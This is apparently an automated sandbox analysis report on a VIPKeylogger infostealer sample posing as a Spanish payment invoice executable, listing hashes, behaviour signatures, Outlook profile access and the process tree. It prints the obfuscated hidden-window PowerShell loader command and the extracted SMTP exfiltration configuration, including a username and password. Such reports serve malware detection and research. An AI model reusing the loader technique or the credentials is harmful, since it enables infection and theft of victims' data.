Analysis
-
max time kernel
292s -
max time network
273s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23-10-2024 13:33
Static task
static1
Behavioral task
behavioral1
Sample
PAGO FRAS. AGOSTO 2024..exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
PAGO FRAS. AGOSTO 2024..exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Vesperkost.ps1
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
Vesperkost.ps1
Resource
win10v2004-20241007-en
General
-
Target
PAGO FRAS. AGOSTO 2024..exe
-
Size
900KB
-
MD5
d2bb55d90b4fe13d981297c8f452e810
-
SHA1
e35c73e93bef613a1aa1cb7707b8cde2489df897
-
SHA256
a286c68d65f2582414caf8229aeaba8365d7b84de92c5da4c39b7482136b5271
-
SHA512
875819a87d64cee9a3d9f4e9afb84adca711d72d7b8a5b3837cd22abff017e57434b8a0de7502118e2a16aaada2d3ab4d89a3cc8db0207d22278ae6046ef4547
-
SSDEEP
24576:obu96/xtr62ldmWFZD6lm7Pytae6/B1Gl:vC3tmKZgm7OjGB1Gl
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
smtp.ionos.es - Port:
587 - Username:
[email protected] - Password:
Comercialplastico3. - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 2820 powershell.exe 4720 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
Processes:
msiexec.exemsiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 16 IoCs
Processes:
msiexec.exemsiexec.exeflow pid process 20 4548 msiexec.exe 21 4584 msiexec.exe 23 4584 msiexec.exe 24 4548 msiexec.exe 26 4548 msiexec.exe 27 4584 msiexec.exe 29 4548 msiexec.exe 30 4584 msiexec.exe 34 4584 msiexec.exe 35 4548 msiexec.exe 54 4584 msiexec.exe 57 4584 msiexec.exe 63 4584 msiexec.exe 65 4548 msiexec.exe 66 4548 msiexec.exe 67 4548 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 53 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
msiexec.exemsiexec.exepid process 4584 msiexec.exe 4548 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
powershell.exepowershell.exemsiexec.exemsiexec.exepid process 4720 powershell.exe 2820 powershell.exe 4548 msiexec.exe 4584 msiexec.exe -
Drops file in Windows directory 4 IoCs
Processes:
PAGO FRAS. AGOSTO 2024..exedescription ioc process File opened for modification C:\Windows\resources\Nebengeschfter.ini PAGO FRAS. AGOSTO 2024..exe File opened for modification C:\Windows\resources\0409\gildes.lak PAGO FRAS. AGOSTO 2024..exe File opened for modification C:\Windows\Fonts\thyrididae.ini PAGO FRAS. AGOSTO 2024..exe File opened for modification C:\Windows\resources\0409\diaspidine.Inq PAGO FRAS. AGOSTO 2024..exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
PAGO FRAS. AGOSTO 2024..exepowershell.exepowershell.exemsiexec.exemsiexec.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PAGO FRAS. AGOSTO 2024..exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 20 IoCs
Processes:
powershell.exepowershell.exemsiexec.exemsiexec.exepid process 2820 powershell.exe 2820 powershell.exe 4720 powershell.exe 4720 powershell.exe 2820 powershell.exe 2820 powershell.exe 2820 powershell.exe 2820 powershell.exe 2820 powershell.exe 2820 powershell.exe 2820 powershell.exe 4720 powershell.exe 4720 powershell.exe 4720 powershell.exe 4720 powershell.exe 4720 powershell.exe 4584 msiexec.exe 4584 msiexec.exe 4548 msiexec.exe 4548 msiexec.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
powershell.exepowershell.exepid process 4720 powershell.exe 2820 powershell.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
Processes:
powershell.exepowershell.exemsiexec.exemsiexec.exedescription pid process Token: SeDebugPrivilege 2820 powershell.exe Token: SeDebugPrivilege 4720 powershell.exe Token: SeIncreaseQuotaPrivilege 2820 powershell.exe Token: SeSecurityPrivilege 2820 powershell.exe Token: SeTakeOwnershipPrivilege 2820 powershell.exe Token: SeLoadDriverPrivilege 2820 powershell.exe Token: SeSystemProfilePrivilege 2820 powershell.exe Token: SeSystemtimePrivilege 2820 powershell.exe Token: SeProfSingleProcessPrivilege 2820 powershell.exe Token: SeIncBasePriorityPrivilege 2820 powershell.exe Token: SeCreatePagefilePrivilege 2820 powershell.exe Token: SeBackupPrivilege 2820 powershell.exe Token: SeRestorePrivilege 2820 powershell.exe Token: SeShutdownPrivilege 2820 powershell.exe Token: SeDebugPrivilege 2820 powershell.exe Token: SeSystemEnvironmentPrivilege 2820 powershell.exe Token: SeRemoteShutdownPrivilege 2820 powershell.exe Token: SeUndockPrivilege 2820 powershell.exe Token: SeManageVolumePrivilege 2820 powershell.exe Token: 33 2820 powershell.exe Token: 34 2820 powershell.exe Token: 35 2820 powershell.exe Token: 36 2820 powershell.exe Token: SeIncreaseQuotaPrivilege 4720 powershell.exe Token: SeSecurityPrivilege 4720 powershell.exe Token: SeTakeOwnershipPrivilege 4720 powershell.exe Token: SeLoadDriverPrivilege 4720 powershell.exe Token: SeSystemProfilePrivilege 4720 powershell.exe Token: SeSystemtimePrivilege 4720 powershell.exe Token: SeProfSingleProcessPrivilege 4720 powershell.exe Token: SeIncBasePriorityPrivilege 4720 powershell.exe Token: SeCreatePagefilePrivilege 4720 powershell.exe Token: SeBackupPrivilege 4720 powershell.exe Token: SeRestorePrivilege 4720 powershell.exe Token: SeShutdownPrivilege 4720 powershell.exe Token: SeDebugPrivilege 4720 powershell.exe Token: SeSystemEnvironmentPrivilege 4720 powershell.exe Token: SeRemoteShutdownPrivilege 4720 powershell.exe Token: SeUndockPrivilege 4720 powershell.exe Token: SeManageVolumePrivilege 4720 powershell.exe Token: 33 4720 powershell.exe Token: 34 4720 powershell.exe Token: 35 4720 powershell.exe Token: 36 4720 powershell.exe Token: SeDebugPrivilege 4584 msiexec.exe Token: SeDebugPrivilege 4548 msiexec.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
PAGO FRAS. AGOSTO 2024..exepowershell.exepowershell.exedescription pid process target process PID 1404 wrote to memory of 2820 1404 PAGO FRAS. AGOSTO 2024..exe powershell.exe PID 1404 wrote to memory of 2820 1404 PAGO FRAS. AGOSTO 2024..exe powershell.exe PID 1404 wrote to memory of 2820 1404 PAGO FRAS. AGOSTO 2024..exe powershell.exe PID 1404 wrote to memory of 4720 1404 PAGO FRAS. AGOSTO 2024..exe powershell.exe PID 1404 wrote to memory of 4720 1404 PAGO FRAS. AGOSTO 2024..exe powershell.exe PID 1404 wrote to memory of 4720 1404 PAGO FRAS. AGOSTO 2024..exe powershell.exe PID 4720 wrote to memory of 4584 4720 powershell.exe msiexec.exe PID 4720 wrote to memory of 4584 4720 powershell.exe msiexec.exe PID 4720 wrote to memory of 4584 4720 powershell.exe msiexec.exe PID 4720 wrote to memory of 4584 4720 powershell.exe msiexec.exe PID 2820 wrote to memory of 4548 2820 powershell.exe msiexec.exe PID 2820 wrote to memory of 4548 2820 powershell.exe msiexec.exe PID 2820 wrote to memory of 4548 2820 powershell.exe msiexec.exe PID 2820 wrote to memory of 4548 2820 powershell.exe msiexec.exe -
outlook_office_path 1 IoCs
Processes:
msiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
Processes:
msiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\PAGO FRAS. AGOSTO 2024..exe"C:\Users\Admin\AppData\Local\Temp\PAGO FRAS. AGOSTO 2024..exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Brankedes=Get-Content -raw 'C:\Users\Admin\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Vesperkost.Ufo';$Udskibningshavnene=$Brankedes.SubString(28086,3);.$Udskibningshavnene($Brankedes)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:4548
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Brankedes=Get-Content -raw 'C:\Users\Admin\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Vesperkost.Ufo';$Udskibningshavnene=$Brankedes.SubString(28086,3);.$Udskibningshavnene($Brankedes)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4720 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4584
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
854B
MD5e935bc5762068caf3e24a2683b1b8a88
SHA182b70eb774c0756837fe8d7acbfeec05ecbf5463
SHA256a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d
SHA512bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD5f5c9938a2fa3fc7c84debe9b5699bd85
SHA1698dde95fa540adaedf8c6c475730896609a8fd0
SHA2562d21778bc0d4f0798a5c652a62f2971db17dcf2462b0c13d89bd02de1d6df3f3
SHA5124dfee6086310236069239716570f6d0c63946a01b62e644447d9f6c5c3231e50b9041cc6a4d1378d58a6f694520a825e7abf98fc501c519750602ccfebd3479b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
Filesize471B
MD5ed2bc277627fe9729bb6e14fc0ca8651
SHA145904821d33b90391b60e1c78283343b40167f79
SHA2567d3aa148aa339df14b24d65c7ec460b0bec9067dee838ef9a48a1028e393a99b
SHA512e02dd1357820ef6824580e5d9277ffcaa8540f936ae076de3dca4a61c2ab4ad0b4d1b024a171473bbd65bd8a9cf27f46167f3f38be04d56280b7348abe23440a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
Filesize472B
MD5452e11716ea4843afe2f66561e31bed5
SHA136e2c61b5ead22352683945567e75f3bfbfc6b3c
SHA2569daa8523616103e9dd1f7ba52b95b16fcf1b6935d43488db6abf5467dceab917
SHA512b9089c671248e5a4b47742756da9837ae49da54a9cd3072624266adaaf69bcc32dabde6fcd1b7529ec6fefa3b127ec745ce425f3de22bc3cff1b922be8075d89
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199
Filesize170B
MD5d6a67fabbd0da544d79604ce9cc07023
SHA16431440f7647206de6c662464c5aeaead28e3167
SHA2563151e5f33207f802c425da74fba923160244e55048fc4e7f5a24444a7a539e6b
SHA5127eda85646ced1fc8efccb5ad5a26aa08cce99196538f11fa3b86fb8c7ab2051dcf32737f1cd7e22c3a89edd9b852523faf0bd889e037b1fa58436a1e70d59dfe
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199
Filesize170B
MD534ce4de4155618418db109be37cc95fc
SHA1b6e0b8d43da27ebf7e19acb19d861e422b64c1d2
SHA2564949ff9229d6973b268e4ac7b6fd03ffc2e08522d997669455533db076e68c05
SHA512224210d1fe02ae93fbead46ef9ad1465b5a54c2188ba49401e8004f5f8cb55dda59f9cdaebdf659e04f456d05bfa9466c44f19bce29dc9660e2dd03df87c1c8b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD5054e6fced6e5b25e0cca1d6dbd763af1
SHA1182c525d8daea565724119b05271bf9c344a0886
SHA256fddb5d5f0a5faae4dd7850c38e3e1698b95b7c4887bd4d9cada562119297c2a8
SHA51243dbdee046e226aa39099029283376f09af75fece05d6a1aa4e4370744ea19b20af32ad4013968f8d8bfa532a81b16d2b83ec696cba5bf872e7bf3b1d6f975f1
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
Filesize406B
MD5c9bb529f59c3dfc426933fe06bef1ae8
SHA18c7f45a44ec7160540329b746203c1bacbe62354
SHA256b2da0f494a5a85a94e748bb02eb9150b082819d0ac2b8c69f674a01b4e15a0bb
SHA512f6f9333aa15bfd4d619387e3cc74313fb317b63d10611880540956ea60dabce885ba0dcd42c44f4e5bcd8682a17a7cbb2ad35dee4f98d7315d042f515cd634c6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
Filesize402B
MD52a946bb5a9196938c244b82aa07e7181
SHA14cfc5e1fe499b515608b49b6725d41b7d2e109cc
SHA2566a4de8d0125c7d09a030a1ab175682dd95cf3be9960b900670827bd7f24bdc92
SHA512fa708036b79dc368bf87d86739febe7881c304df301ca813e81771479aa4c51ab71423c7d926d518a6526c4b3924a73e7cb27710c0dfad9bbfcd13ac1a76c1e9
-
Filesize
775B
MD5fb241d07e8b3558780b49a931067493f
SHA1ed95b20fead530b5877817a20a8b629cd25f95b5
SHA25662ad1d76ff6fd74fb79518f040a9f3b8823bb2d02c59b99d0e26a1f186c6e298
SHA512a848644033ea3b2066de5847b1201ee6b766ea7405ba1adc7565c8e4dacc26513a4564b6d65850fe4bd49c84391bc5a5241b8603fa56cfb72352ac06dd621c8c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
303KB
MD5dcbe6272699402aff5f14d475bdd8542
SHA1c4c05fa37bba0a92ec4238ed9f139011571f9893
SHA25636f696e2b4fdc6beb4f8cdea8d264c7b92a40604f90660715f11aa341c7009a8
SHA512b84f173f8c09118f6146fc3c1cc647cfd0e31845ab8641ce50056befa6199c10785fa17e3e42aa56a27263e3fbd638ef758dacfc3ebae6506ebce64a3d512c5e
-
Filesize
53KB
MD5e35283bacb62d15976b5841105b466a1
SHA10203661c08ae261483cd9da1c21d7173f8ea329d
SHA256d6a7990b9c733d4ba3b1b0d2e5e42dfa2253b22fe345f4870bf24686c516788d
SHA5129a0fbd409e74472330f6ec78e453af0825704d3d1f132657b6f8f32f738d51dc70a4124edade7c0fe3c6cc48c6774f8d822d4207d7e5f0879ae386df3e9521e6
-
Filesize
32B
MD553898e643bd3e0ca22a462325ad62da4
SHA1e0f08a75fa5219f39e49c1b9f361119905da7d02
SHA256b947991000aea669ebfeadfb12de45121d46ad3dfd02296f373f9bf8ce4f1aff
SHA512aa17b99a93a04f7bbbb92f34c15921da80e20592a39b3921f1d3cc59fae55f66196b2be4f56716846daff041253cb63d7e373b84234d451181c87f1d097fe8ca